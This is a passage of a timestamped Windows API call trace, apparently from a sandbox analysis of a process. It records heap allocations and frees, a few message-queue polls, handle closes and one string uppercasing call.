RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0251.696] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0251.696] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0251.696] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.697] FreeLibrary (hLibModule=0x74d40000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0251.697] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0251.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0251.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0251.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.699] CloseHandle (hObject=0x2c8) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0251.700] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0251.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0251.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2f8 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0251.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.701] CloseHandle (hObject=0x2a0) returned 1 [0251.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0251.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0251.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0251.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0251.704] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0251.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0251.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0251.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0251.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0251.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0251.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0251.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.710] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0251.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) 